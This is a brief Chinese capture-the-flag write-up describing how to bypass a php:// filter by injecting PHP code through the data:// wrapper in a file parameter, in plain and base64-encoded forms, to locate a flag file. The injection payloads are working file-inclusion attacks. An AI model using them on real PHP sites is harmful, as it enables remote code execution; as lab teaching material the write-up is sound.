分析代码,发现 php:// 被过滤了 ,php://伪协议用不成了,用data://伪协议
①?file=data://text/plain,<?php phpinfo();?>
出现三个文件 访问fl4gisisish3r3.php
然后在源代码中可看到flag
②?file=data://text/plain;base64,base64编码后再url编码后的<?php phpinfo();?>
然后访问fl4gisisish3r3.php 同样需要base64编码后再url编码
同样,在源代码中会发现flag
如果用一种方法做完后想要用另一种方法再试试,记得把历史记录删了,不然会不显示